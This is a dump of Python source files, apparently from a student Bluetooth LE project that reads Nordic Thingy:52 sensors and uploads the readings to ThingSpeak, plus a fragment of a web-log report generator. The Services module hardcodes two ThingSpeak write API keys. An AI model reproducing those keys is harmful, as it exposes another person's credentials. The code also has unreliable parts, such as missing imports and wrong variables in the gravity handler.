second_line_flag=config.second_line_flag, hours_times=hours_times, minutes_times=minutes_times, seconds_times=seconds_times, method_counts=data.get('method_counts'), cost_time_range_percentile=data.get('cost_time_range_percentile'), cost_time_list=data.get('cost_time_list'), cost_time_flag=data.get('cost_time_flag'), cost_time_percentile_flag=data.get('cost_time_percentile_flag'), cost_time_threshold=data.get('cost_time_threshold'), cost_time_range=data.get('cost_time_range'), status_codes=data.get('status_codes'), status_codes_keys=data.get('status_codes').keys()) html_file = '../result/report/' + data.get('source_file') + '.html' with open(html_file, 'wb') as f: f.write((html.encode('utf-8'))) def generate_web_log_parser_urls(data): html = url_template.render(data=data, url_datas=sorted(data.get('urls'))) html_file = '../result/urls/' + data.get('source_file') + '_urls.html' with open(html_file, 'wb') as f: f.write((html.encode('utf-8'))) def update_index_html(): html = index_template.render(files=sorted(get_dir_files('../result/report/'))) with open('../result/index.html', 'wb') as f: f.write((html.encode('utf-8')))
Python
118
43.110168
107
/web-log-parser/bin/report.py
0.578482
0.564842
Nimunex/TFG
refs/heads/master
from bluepy import btle from bluepy.btle import Peripheral, DefaultDelegate import Services from Services import EnvironmentService, BatterySensor, UserInterfaceService, MotionService, DeviceDelegate ## Thingy52 Definition class Device(Peripheral): ##Thingy:52 module. Instance the class and enable to get access to the Thingy:52 Sensors. #The addr of your device has to be know, or can be found by using the hcitool command line #tool, for example. Call "> sudo hcitool lescan" and your Thingy's address should show up. def __init__(self, addr): Peripheral.__init__(self, addr, addrType="random") #Thingy configuration service not implemented self.battery = BatterySensor(self) self.environment = EnvironmentService(self) self.ui = UserInterfaceService(self) self.motion = MotionService(self) #self.sound = SoundService(self)
Python
22
40.31818
107
/Device.py
0.69255
0.686254
Nimunex/TFG
refs/heads/master
##################################################################### # BLE devices handler # # A new subprocess is created for each preregistered device in: # # ./devices.mac # ##################################################################### import subprocess import time #~ mac_file = open('devices.mac', 'r') #~ for mac_address in mac_file: #~ subprocess.call(['gnome-terminal', '-e', 'python3 main.py ' + mac_address]) #~ time.sleep(10) subprocess.call(['gnome-terminal', '-e', 'python3 main.py FD:88:50:58:E7:45' ]) time.sleep(20) subprocess.call(['gnome-terminal', '-e', 'python3 mainMotion.py E4:F6:C5:F7:03:39' ])
Python
18
40
85
/call.py
0.451219
0.418699
Nimunex/TFG
refs/heads/master
from bluepy import btle from bluepy.btle import UUID,Peripheral, DefaultDelegate import os.path import struct import sys import binascii from urllib.request import urlopen import bitstring import fxpmath from bitstring import BitArray from fxpmath import Fxp #Useful functions def write_uint16(data, value, index): ## Write 16bit value into data string at index and return new string data = data.decode('utf-8') # This line is added to make sure both Python 2 and 3 works return '{}{:02x}{:02x}{}'.format( data[:index*4], value & 0xFF, value >> 8, data[index*4 + 4:]) def write_uint8(data, value, index): ## Write 8bit value into data string at index and return new string data = data.decode('utf-8') # This line is added to make sure both Python 2 and 3 works return '{}{:02x}{}'.format( data[:index*2], value, data[index*2 + 2:]) def getTimeStamp(): ts = time.time() ts_str = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') return ts_str #API key for environment services WRITE_API = "AZOKZQAG2ZC1P2Z2" BASE_URL = "https://api.thingspeak.com/update?api_key={}".format(WRITE_API) #API key for motion services WRITE_API_2 = "L8IVUKY6GII5QP95" BASE_URL_2 = "https://api.thingspeak.com/update?api_key={}".format(WRITE_API_2) ThingSpeakPrevSec = 0 ThingSpeakInterval = 20 # 20 seconds ## Definition of all UUID used for Environment Service CCCD_UUID = 0x2902 ##Environment UUID ENVIRONMENT_SERVICE_UUID = "ef680200-9b35-4933-9B10-52FFA9740042" TEMPERATURE_CHAR_UUID = "ef680201-9b35-4933-9B10-52FFA9740042" PRESSURE_CHAR_UUID = "ef680202-9b35-4933-9B10-52FFA9740042" HUMIDITY_CHAR_UUID = "ef680203-9b35-4933-9B10-52FFA9740042" GAS_CHAR_UUID = "ef680204-9b35-4933-9B10-52FFA9740042" COLOR_CHAR_UUID = "ef680205-9b35-4933-9B10-52FFA9740042" CONFIG_CHAR_UUID = "ef680206-9b35-4933-9B10-52FFA9740042" ##Battery UUID BATTERY_SERVICE_UUID = 0x180F BATTERY_LEVEL_UUID = 0x2A19 ##UI UUID USER_INTERFACE_SERVICE_UUID = "ef680300-9b35-4933-9B10-52FFA9740042" LED_CHAR_UUID = "ef680301-9b35-4933-9B10-52FFA9740042" BUTTON_CHAR_UUID = "ef680302-9b35-4933-9B10-52FFA9740042" EXT_PIN_CHAR_UUID = "ef680303-9b35-4933-9B10-52FFA9740042" ##Motion UUID MOTION_SERVICE_UUID = "ef680400-9b35-4933-9B10-52FFA9740042" TAP_CHAR_UUID = "ef680402-9b35-4933-9B10-52FFA9740042" ORIENTATION_CHAR_UUID = "ef680403-9b35-4933-9B10-52FFA9740042" QUATERNION_CHAR_UUID = "ef680404-9b35-4933-9B10-52FFA9740042" STEP_COUNTER_CHAR_UUID = "ef680405-9b35-4933-9B10-52FFA9740042" RAW_DATA_CHAR_UUID = "ef680406-9b35-4933-9B10-52FFA9740042" EULER_CHAR_UUID = "ef680407-9b35-4933-9B10-52FFA9740042" ROTATION_MATRIX_CHAR_UUID = "ef680408-9b35-4933-9B10-52FFA9740042" HEADING_CHAR_UUID = "ef680409-9b35-4933-9B10-52FFA9740042" GRAVITY_VECTOR_CHAR_UUID = "ef68040A-9b35-4933-9B10-52FFA9740042" M_CONFIG_CHAR_UUID = "ef680401-9b35-4933-9B10-52FFA9740042" ## Notification handles used in notification delegate ##Environment handles temperature_handle = None pressure_handle = None humidity_handle = None gas_handle = None color_handle = None ##Battery handles battery_handle = None ##UI handles button_handle = None ##Motion handles tap_handle = None orient_handle = None quaternion_handle = None stepcount_handle = None rawdata_handle = None euler_handle = None rotation_handle = None heading_handle = None gravity_handle = None ## Notifications /Indications Handler class DeviceDelegate(DefaultDelegate): def handleNotification(self, hnd, data): ##Environment delegate if (hnd == temperature_handle): data = bytearray(data) temperature_int = data[0] temperature_dec = data[1] print("A notification was received -> Temperature:", temperature_int, ',', temperature_dec, "ºC") #~ if time() - ThingSpeakPrevSec > ThingSpeakInterval: #~ ThingSpeakPrevSec = time() thingspeakHttp = BASE_URL + "&field1={:.2f}".format(temperature_int + temperature_dec*0.01) conn = urlopen(thingspeakHttp) print("Response: {}".format(conn.read())) conn.close() elif (hnd == pressure_handle): teptep = binascii.b2a_hex(data) pressure_int = 0 for i in range(0, 4): pressure_int += (int(teptep[i*2:(i*2)+2], 16) << 8*i) pressure_dec = int(teptep[-2:], 16) print("A notification was received -> Pressure: ", pressure_int,',', pressure_dec, " hPa") #~ if time() - ThingSpeakPrevSec > ThingSpeakInterval: #~ ThingSpeakPrevSec = time() thingspeakHttp2 = BASE_URL + "&field2={:.2f}".format(pressure_int + pressure_dec*0.01) conn = urlopen(thingspeakHttp2) print("Response: {}".format(conn.read())) conn.close() elif (hnd == humidity_handle): data = bytearray(data) humidity_value =int.from_bytes(data, byteorder='big', signed=False) # timestamp = getTimeStamp() print("A notification was received -> Humidity: ", humidity_value, " %") #~ if time() - ThingSpeakPrevSec > ThingSpeakInterval: #~ ThingSpeakPrevSec = time() thingspeakHttp3 = BASE_URL + "&field3={:.2f}".format(humidity_value) conn = urlopen(thingspeakHttp3) print("Response: {}".format(conn.read())) conn.close() elif (hnd == gas_handle): teptep = binascii.b2a_hex(data) eco2 = 0 tvoc = 0 for i in range(0, 2): eco2 += (int(teptep[i*2:(i*2)+2], 16) << 8*i) for i in range(2, 4): tvoc += (int(teptep[i*2:(i*2)+2], 16) << 8*(i-2)) print("A notification was received -> Gas: ", eco2, " ppm", tvoc,"ppb") #~ if time() - ThingSpeakPrevSec > ThingSpeakInterval: #~ ThingSpeakPrevSec = time() thingspeakHttp4 = BASE_URL + "&field3={:.2f}".format(eco2) conn = urlopen(thingspeakHttp4) print("Response: {}".format(conn.read())) conn.close() elif (hnd == color_handle): teptep = binascii.b2a_hex(data) red = 0 green = 0 blue = 0 clear = 0 for i in range(0, 2): red += (int(teptep[i*2:(i*2)+2], 16) << 8*i) for i in range(2, 4): green += (int(teptep[i*2:(i*2)+2], 16) << 8*(i-2)) for i in range(4, 6): blue += (int(teptep[i*2:(i*2)+2], 16) << 8*(i-4)) for i in range(6, 8): clear += (int(teptep[i*2:(i*2)+2], 16) << 8*(i-6)) print("A notification was received -> Color: ", red, green, blue, clear) thingspeakHttp13 = BASE_URL + "&field5={:.2f}".format(red) conn = urlopen(thingspeakHttp13) print("Response: {}".format(conn.read())) conn.close() thingspeakHttp14 = BASE_URL + "&field6={:.2f}".format(green) conn = urlopen(thingspeakHttp14) print("Response: {}".format(conn.read())) conn.close() thingspeakHttp15 = BASE_URL + "&field7={:.2f}".format(blue) conn = urlopen(thingspeakHttp15) print("Response: {}".format(conn.read())) conn.close() ##Battery delegate elif (hnd == battery_handle): data = bytearray(data) battery_value = data[0] print("A notification was received -> Battery:", battery_value, "%") ##UI delegate elif (hnd == button_handle): data = bytearray(data) button = data[0] print("A notification was received -> Button[1-> pressed]: ", button) thingspeakHttp6 = BASE_URL + "&field8={:}".format(button) conn = urlopen(thingspeakHttp6) print("Response: {}".format(conn.read())) conn.close() ##Motion delegate elif (hnd == tap_handle): data = bytearray(data) tap = data[0] count = data[1] if tap == 0x01: print("A notification was received -> TAP_X_UP, count: ", count) elif tap == 0x02: print("A notification was received -> TAP_X_DOWN, count: ", count) elif tap == 0x03: print("A notification was received -> TAP_Y_UP, count: ", count) elif tap == 0x04: print("A notification was received -> TAP_Y_DOWN, count: ", count) elif tap == 0x05: print("A notification was received -> TAP_Z_UP, count: ", count) elif tap == 0x06: print("A notification was received -> TAP_Z_DOWN, count: ", count) elif (hnd == orient_handle): data = bytearray(data) orientation = data[0] if orientation == 0x00: print("A notification was received -> Orientation: Portrait ") elif orientation == 0x01: print("A notification was received -> Orientation: Landscape ") elif orientation == 0x02: print("A notification was received -> Orientation: Reverse Portrait ") elif orientation == 0x03: print("A notification was received -> Orientation: Reverse Landscape ") elif (hnd == quaternion_handle): #True if this is negative number negative = False result = 0 #check oldest bit if data[3] & 0x80: negative = True result = data[3] << 24 result += data[2] << 16 result += data[1] << 8 result += data[0] w = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 w = -1. * (float(result) / 1073741823.) else: #this is positive w = float(result) / 1073741823. #~ print( "{:.4f}".format( resultF )) #True if this is negative number negative = False result = 0 #check oldest bit if data[7] & 0x80: negative = True result = data[7] << 24 result += data[6] << 16 result += data[5] << 8 result += data[4] x = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 x = -1. * (float(result) / 1073741823.) else: #this is positive x = float(result) / 1073741823. #True if this is negative number negative = False result = 0 #check oldest bit if data[11] & 0x80: negative = True result = data[11] << 24 result += data[10] << 16 result += data[9] << 8 result += data[8] y = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 y = -1. * (float(result) / 1073741823.) else: #this is positive y = float(result) / 1073741823. #True if this is negative number negative = False result = 0 #check oldest bit if data[15] & 0x80: negative = True result = data[15] << 24 result += data[14] << 16 result += data[13] << 8 result += data[12] z = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 z = -1. * (float(result) / 1073741823.) else: #this is positive z = float(result) / 1073741823. print("A notification was received -> Quaternion(w,x,y,z): {:.2f}, {:.2f}, {:.2f}, {:.2f}".format(w,x,y,z)) elif (hnd == stepcount_handle): teptep = binascii.b2a_hex(data) steps = 0 time = 0 for i in range(0, 4): steps += (int(teptep[i*2:(i*2)+2], 16) << 8*i) for i in range(4, 8): time += (int(teptep[i*2:(i*2)+2], 16) << 8*(i-4)) print("A notification was received -> Stepcount(steps,time): ", steps, time) #~ print('Notification: Step Count: {}'.format(teptep)) elif (hnd == rawdata_handle): ##Accelerometer #True if this is negative number negative = False result = 0 #check oldest bit if data[1] & 0x80: negative = True result = data[1] << 8 result += data[0] ax = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 ax = -1. * (float(result) / 1023.) else: #this is positive ax = float(result) / 1023. #True if this is negative number negative = False result = 0 #check oldest bit if data[3] & 0x80: negative = True result = data[3] << 8 result += data[2] ay = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 ay = -1. * (float(result) / 1023.) else: #this is positive ay = float(result) / 1023. #True if this is negative number negative = False result = 0 #check oldest bit if data[5] & 0x80: negative = True result = data[5] << 8 result += data[4] az = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 az = -1. * (float(result) / 1023.) else: #this is positive az = float(result) / 1023. ##Gyroscope #True if this is negative number negative = False result = 0 #check oldest bit if data[7] & 0x80: negative = True result = data[7] << 8 result += data[6] gx = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 gx = -1. * (float(result) / 31.) else: #this is positive gx = float(result) / 31. #True if this is negative number negative = False result = 0 #check oldest bit if data[9] & 0x80: negative = True result = data[9] << 8 result += data[8] gy = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 gy = -1. * (float(result) / 31.) else: #this is positive gy = float(result) / 31. #True if this is negative number negative = False result = 0 #check oldest bit if data[11] & 0x80: negative = True result = data[11] << 8 result += data[10] gz = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 gz = -1. * (float(result) / 31.) else: #this is positive gz = float(result) / 31. ##Compass #True if this is negative number negative = False result = 0 #check oldest bit if data[13] & 0x80: negative = True result = data[13] << 8 result += data[12] cx = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 cx = -1. * (float(result) / 15.) else: #this is positive cx = float(result) / 15. #True if this is negative number negative = False result = 0 #check oldest bit if data[15] & 0x80: negative = True result = data[15] << 8 result += data[14] cy = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 cy = -1. * (float(result) / 15.) else: #this is positive cy = float(result) / 15. #True if this is negative number negative = False result = 0 #check oldest bit if data[17] & 0x80: negative = True result = data[17] << 8 result += data[16] cz = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 cz = -1. * (float(result) / 15.) else: #this is positive cz = float(result) / 15. print("A notification was received -> Raw data: Accelerometer(G):{:.2f}, {:.2f}, {:.2f} Gyroscope(deg/s): {:.2f}, {:.2f}, {:.2f} Compass(uT): {:.2f}, {:.2f}, {:.2f}".format(ax,ay,az,gx,gy,gz,cx,cy,cz)) elif (hnd == euler_handle): #True if this is negative number negative = False result = 0 #check oldest bit if data[3] & 0x80: negative = True result = data[3] << 24 result += data[2] << 16 result += data[1] << 8 result += data[0] roll = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 roll = -1. * (float(result) / 65535.) else: #this is positive roll = float(result) / 65535. #~ print( "{:.4f}".format( resultF )) #True if this is negative number negative = False result = 0 #check oldest bit if data[7] & 0x80: negative = True result = data[7] << 24 result += data[6] << 16 result += data[5] << 8 result += data[4] pitch = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 pitch = -1. * (float(result) / 65535.) else: #this is positive pitch = float(result) / 65535. #True if this is negative number negative = False result = 0 #check oldest bit if data[11] & 0x80: negative = True result = data[11] << 24 result += data[10] << 16 result += data[9] << 8 result += data[8] yaw = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 yaw = -1. * (float(result) / 65535.) else: #this is positive yaw = float(result) / 65535. print("A notification was received -> Euler(roll,pitch,yaw)[degrees]: {:.2f}, {:.2f}, {:.2f}".format(roll,pitch,yaw)) thingspeakHttp7 = BASE_URL_2 + "&field1={:.2f}".format(roll) conn = urlopen(thingspeakHttp7) print("Response: {}".format(conn.read())) conn.close() thingspeakHttp8 = BASE_URL_2 + "&field2={:.2f}".format(pitch) conn = urlopen(thingspeakHttp8) print("Response: {}".format(conn.read())) conn.close() thingspeakHttp9 = BASE_URL_2 + "&field3={:.2f}".format(yaw) conn = urlopen(thingspeakHttp9) print("Response: {}".format(conn.read())) conn.close() elif (hnd == rotation_handle): teptep = binascii.b2a_hex(data) print('Notification: Rotation matrix: {}'.format(teptep)) elif (hnd == heading_handle): #True if this is negative number negative = False result = 0 #check oldest bit if data[3] & 0x80: negative = True result = data[3] << 24 result += data[2] << 16 result += data[1] << 8 result += data[0] heading = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 heading = -1. * (float(result) / 65535.) else: #this is positive heading = float(result) / 65535. print("A notification was received -> Heading(degrees): ", heading) elif (hnd == gravity_handle): d2=data[0:4] [gx] = struct.unpack('f', d2) d3=data[4:8] [gy] = struct.unpack('f', d3) d4=data[8:12] [gz] = struct.unpack('f', d4) print("A notification was received -> Gravity(x,y,z): {:.2f}, {:.2f}, {:.2f}".format(gx,gy,gz)) thingspeakHttp10 = BASE_URL_2 + "&field1={:.2f}".format(roll) conn = urlopen(thingspeakHttp10) print("Response: {}".format(conn.read())) conn.close() thingspeakHttp11 = BASE_URL_2 + "&field2={:.2f}".format(pitch) conn = urlopen(thingspeakHttp11) print("Response: {}".format(conn.read())) conn.close() thingspeakHttp12 = BASE_URL_2 + "&field3={:.2f}".format(yaw) conn = urlopen(thingspeakHttp12) print("Response: {}".format(conn.read())) conn.close() class EnvironmentService(): ##Environment service module. Instance the class and enable to get access to the Environment interface. serviceUUID = ENVIRONMENT_SERVICE_UUID temperature_char_uuid = TEMPERATURE_CHAR_UUID pressure_char_uuid = PRESSURE_CHAR_UUID humidity_char_uuid = HUMIDITY_CHAR_UUID gas_char_uuid = GAS_CHAR_UUID color_char_uuid = COLOR_CHAR_UUID config_char_uuid = CONFIG_CHAR_UUID def __init__(self, periph): self.periph = periph self.environment_service = None self.temperature_char = None self.temperature_cccd = None self.pressure_char = None self.pressure_cccd = None self.humidity_char = None self.humidity_cccd = None self.gas_char = None self.gas_cccd = None self.color_char = None self.color_cccd = None self.config_char = None def enable(self): ##Enables the class by finding the service and its characteristics. global temperature_handle global pressure_handle global humidity_handle global gas_handle global color_handle if self.environment_service is None: self.environment_service = self.periph.getServiceByUUID(self.serviceUUID) if self.temperature_char is None: self.temperature_char = self.environment_service.getCharacteristics(self.temperature_char_uuid)[0] temperature_handle = self.temperature_char.getHandle() self.temperature_cccd = self.temperature_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.pressure_char is None: self.pressure_char = self.environment_service.getCharacteristics(self.pressure_char_uuid)[0] pressure_handle = self.pressure_char.getHandle() self.pressure_cccd = self.pressure_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.humidity_char is None: self.humidity_char = self.environment_service.getCharacteristics(self.humidity_char_uuid)[0] humidity_handle = self.humidity_char.getHandle() self.humidity_cccd = self.humidity_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.gas_char is None: self.gas_char = self.environment_service.getCharacteristics(self.gas_char_uuid)[0] gas_handle = self.gas_char.getHandle() self.gas_cccd = self.gas_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.color_char is None: self.color_char = self.environment_service.getCharacteristics(self.color_char_uuid)[0] color_handle = self.color_char.getHandle() self.color_cccd = self.color_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.config_char is None: self.config_char = self.environment_service.getCharacteristics(self.config_char_uuid)[0] def set_temperature_notification(self, state): ## Enable/Disable Temperature Notifications if self.temperature_cccd is not None: if state == True: self.temperature_cccd.write(b"\x01\x00", True) else: self.temperature_cccd.write(b"\x00\x00", True) def set_pressure_notification(self, state): ## Enable/Disable Pressure Notifications if self.pressure_cccd is not None: if state == True: self.pressure_cccd.write(b"\x01\x00", True) else: self.pressure_cccd.write(b"\x00\x00", True) def set_humidity_notification(self, state): ## Enable/Disable Humidity Notifications if self.humidity_cccd is not None: if state == True: self.humidity_cccd.write(b"\x01\x00", True) else: self.humidity_cccd.write(b"\x00\x00", True) def set_gas_notification(self, state): ## Enable/Disable Gas Notifications if self.gas_cccd is not None: if state == True: self.gas_cccd.write(b"\x01\x00", True) else: self.gas_cccd.write(b"\x00\x00", True) def set_color_notification(self, state): ## Enable/Disable Color Notifications if self.color_cccd is not None: if state == True: self.color_cccd.write(b"\x01\x00", True) else: self.color_cccd.write(b"\x00\x00", True) def configure(self, temp_int=None, press_int=None, humid_int=None, gas_mode_int=None, color_int=None, color_sens_calib=None): if temp_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, temp_int, 0) self.config_char.write(binascii.a2b_hex(new_config), True) if press_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, press_int, 1) self.config_char.write(binascii.a2b_hex(new_config), True) if humid_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, humid_int, 2) self.config_char.write(binascii.a2b_hex(new_config), True) if gas_mode_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint8(current_config, gas_mode_int, 8) self.config_char.write(binascii.a2b_hex(new_config), True) if color_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, color_int, 3) self.config_char.write(binascii.a2b_hex(new_config), True) if color_sens_calib is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint8(current_config, color_sens_calib[0], 9) new_config = write_uint8(current_config, color_sens_calib[1], 10) new_config = write_uint8(current_config, color_sens_calib[2], 11) self.config_char.write(binascii.a2b_hex(new_config), True) def disable(self): ## Disable Environment Notifications self.set_temperature_notification(False) self.set_pressure_notification(False) self.set_humidity_notification(False) self.set_gas_notification(False) self.set_color_notification(False) class BatterySensor(): ##Battery Service module. Instance the class and enable to get access to Battery interface. svcUUID = UUID(BATTERY_SERVICE_UUID) # Ref https://www.bluetooth.com/specifications/gatt/services dataUUID = UUID(BATTERY_LEVEL_UUID) # Ref https://www.bluetooth.com/specifications/gatt/characteristics def __init__(self, periph): self.periph = periph self.service = None self.data = None self.data_cccd = None def enable(self): ##Enables the class by finding the service and its characteristics. global battery_handle if self.service is None: self.service = self.periph.getServiceByUUID(self.svcUUID) if self.data is None: self.data = self.service.getCharacteristics(self.dataUUID)[0] battery_handle = self.data.getHandle() self.data_cccd = self.data.getDescriptors(forUUID=CCCD_UUID)[0] def b_read(self): ## Returns the battery level in percent val = ord(self.data.read()) return val def set_battery_notification(self, state): ## Enable/Disable Battery Notifications if self.data_cccd is not None: if state == True: self.data_cccd.write(b"\x01\x00", True) else: self.data_cccd.write(b"\x00\x00", True) def disable(self): ## Disable Battery Notifications self.set_battery_notification(False) class UserInterfaceService(): """ User interface service module. Instance the class and enable to get access to the UI interface. """ serviceUUID = USER_INTERFACE_SERVICE_UUID led_char_uuid = LED_CHAR_UUID btn_char_uuid = BUTTON_CHAR_UUID # To be added: EXT PIN CHAR def __init__(self, periph): self.periph = periph self.ui_service = None self.led_char = None self.btn_char = None self.btn_char_cccd = None # To be added: EXT PIN CHAR def enable(self): """ Enables the class by finding the service and its characteristics. """ global button_handle if self.ui_service is None: self.ui_service = self.periph.getServiceByUUID(self.serviceUUID) if self.led_char is None: self.led_char = self.ui_service.getCharacteristics(self.led_char_uuid)[0] if self.btn_char is None: self.btn_char = self.ui_service.getCharacteristics(self.btn_char_uuid)[0] button_handle = self.btn_char.getHandle() self.btn_char_cccd = self.btn_char.getDescriptors(forUUID=CCCD_UUID)[0] def set_led_mode_off(self): self.led_char.write(b"\x00", True) def set_led_mode_constant(self, r, g, b): teptep = "01{:02X}{:02X}{:02X}".format(r, g, b) self.led_char.write(binascii.a2b_hex(teptep), True) def set_led_mode_breathe(self, color, intensity, delay): """ Set LED to breathe mode. color has to be within 0x01 and 0x07 intensity [%] has to be within 1-100 delay [ms] has to be within 1 ms - 10 s """ teptep = "02{:02X}{:02X}{:02X}{:02X}".format(color, intensity, delay & 0xFF, delay >> 8) self.led_char.write(binascii.a2b_hex(teptep), True) def set_led_mode_one_shot(self, color, intensity): """ Set LED to one shot mode. color has to be within 0x01 and 0x07 intensity [%] has to be within 1-100 """ teptep = "03{:02X}{:02X}".format(color, intensity) self.led_char.write(binascii.a2b_hex(teptep), True) def set_button_notification(self, state): if self.btn_char_cccd is not None: if state == True: self.btn_char_cccd.write(b"\x01\x00", True) else: self.btn_char_cccd.write(b"\x00\x00", True) def disable(self): set_button_notification(False) class MotionService(): ##Motion service module. Instance the class and enable to get access to the Motion interface. serviceUUID = MOTION_SERVICE_UUID config_char_uuid = M_CONFIG_CHAR_UUID tap_char_uuid = TAP_CHAR_UUID orient_char_uuid = ORIENTATION_CHAR_UUID quaternion_char_uuid = QUATERNION_CHAR_UUID stepcnt_char_uuid = STEP_COUNTER_CHAR_UUID rawdata_char_uuid = RAW_DATA_CHAR_UUID euler_char_uuid = EULER_CHAR_UUID rotation_char_uuid = ROTATION_MATRIX_CHAR_UUID heading_char_uuid = HEADING_CHAR_UUID gravity_char_uuid = GRAVITY_VECTOR_CHAR_UUID def __init__(self, periph): self.periph = periph self.motion_service = None self.config_char = None self.tap_char = None self.tap_char_cccd = None self.orient_char = None self.orient_cccd = None self.quaternion_char = None self.quaternion_cccd = None self.stepcnt_char = None self.stepcnt_cccd = None self.rawdata_char = None self.rawdata_cccd = None self.euler_char = None self.euler_cccd = None self.rotation_char = None self.rotation_cccd = None self.heading_char = None self.heading_cccd = None self.gravity_char = None self.gravity_cccd = None def enable(self): ##Enables the class by finding the service and its characteristics. global tap_handle global orient_handle global quaternion_handle global stepcount_handle global rawdata_handle global euler_handle global rotation_handle global heading_handle global gravity_handle if self.motion_service is None: self.motion_service = self.periph.getServiceByUUID(self.serviceUUID) if self.config_char is None: self.config_char = self.motion_service.getCharacteristics(self.config_char_uuid)[0] if self.tap_char is None: self.tap_char = self.motion_service.getCharacteristics(self.tap_char_uuid)[0] tap_handle = self.tap_char.getHandle() self.tap_char_cccd = self.tap_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.orient_char is None: self.orient_char = self.motion_service.getCharacteristics(self.orient_char_uuid)[0] orient_handle = self.orient_char.getHandle() self.orient_cccd = self.orient_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.quaternion_char is None: self.quaternion_char = self.motion_service.getCharacteristics(self.quaternion_char_uuid)[0] quaternion_handle = self.quaternion_char.getHandle() self.quaternion_cccd = self.quaternion_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.stepcnt_char is None: self.stepcnt_char = self.motion_service.getCharacteristics(self.stepcnt_char_uuid)[0] stepcount_handle = self.stepcnt_char.getHandle() self.stepcnt_cccd = self.stepcnt_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.rawdata_char is None: self.rawdata_char = self.motion_service.getCharacteristics(self.rawdata_char_uuid)[0] rawdata_handle = self.rawdata_char.getHandle() self.rawdata_cccd = self.rawdata_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.euler_char is None: self.euler_char = self.motion_service.getCharacteristics(self.euler_char_uuid)[0] euler_handle = self.euler_char.getHandle() self.euler_cccd = self.euler_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.rotation_char is None: self.rotation_char = self.motion_service.getCharacteristics(self.rotation_char_uuid)[0] rotation_handle = self.rotation_char.getHandle() self.rotation_cccd = self.rotation_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.heading_char is None: self.heading_char = self.motion_service.getCharacteristics(self.heading_char_uuid)[0] heading_handle = self.heading_char.getHandle() self.heading_cccd = self.heading_char.getDescriptors(forUUID=CCCD_UUID)[0] if self.gravity_char is None: self.gravity_char = self.motion_service.getCharacteristics(self.gravity_char_uuid)[0] gravity_handle = self.gravity_char.getHandle() self.gravity_cccd = self.gravity_char.getDescriptors(forUUID=CCCD_UUID)[0] def set_tap_notification(self, state): if self.tap_char_cccd is not None: if state == True: self.tap_char_cccd.write(b"\x01\x00", True) else: self.tap_char_cccd.write(b"\x00\x00", True) def set_orient_notification(self, state): if self.orient_cccd is not None: if state == True: self.orient_cccd.write(b"\x01\x00", True) else: self.orient_cccd.write(b"\x00\x00", True) def set_quaternion_notification(self, state): if self.quaternion_cccd is not None: if state == True: self.quaternion_cccd.write(b"\x01\x00", True) else: self.quaternion_cccd.write(b"\x00\x00", True) def set_stepcount_notification(self, state): if self.stepcnt_cccd is not None: if state == True: self.stepcnt_cccd.write(b"\x01\x00", True) else: self.stepcnt_cccd.write(b"\x00\x00", True) def set_rawdata_notification(self, state): if self.rawdata_cccd is not None: if state == True: self.rawdata_cccd.write(b"\x01\x00", True) else: self.rawdata_cccd.write(b"\x00\x00", True) def set_euler_notification(self, state): if self.euler_cccd is not None: if state == True: self.euler_cccd.write(b"\x01\x00", True) else: self.euler_cccd.write(b"\x00\x00", True) def set_rotation_notification(self, state): if self.rotation_cccd is not None: if state == True: self.rotation_cccd.write(b"\x01\x00", True) else: self.rotation_cccd.write(b"\x00\x00", True) def set_heading_notification(self, state): if self.heading_cccd is not None: if state == True: self.heading_cccd.write(b"\x01\x00", True) else: self.heading_cccd.write(b"\x00\x00", True) def set_gravity_notification(self, state): if self.gravity_cccd is not None: if state == True: self.gravity_cccd.write(b"\x01\x00", True) else: self.gravity_cccd.write(b"\x00\x00", True) def configure(self, step_int=None, temp_comp_int=None, magnet_comp_int=None, motion_freq=None, wake_on_motion=None): if step_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, step_int, 0) self.config_char.write(binascii.a2b_hex(new_config), True) if temp_comp_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, temp_comp_int, 1) self.config_char.write(binascii.a2b_hex(new_config), True) if magnet_comp_int is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint16(current_config, magnet_comp_int, 2) self.config_char.write(binascii.a2b_hex(new_config), True) if motion_freq is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = 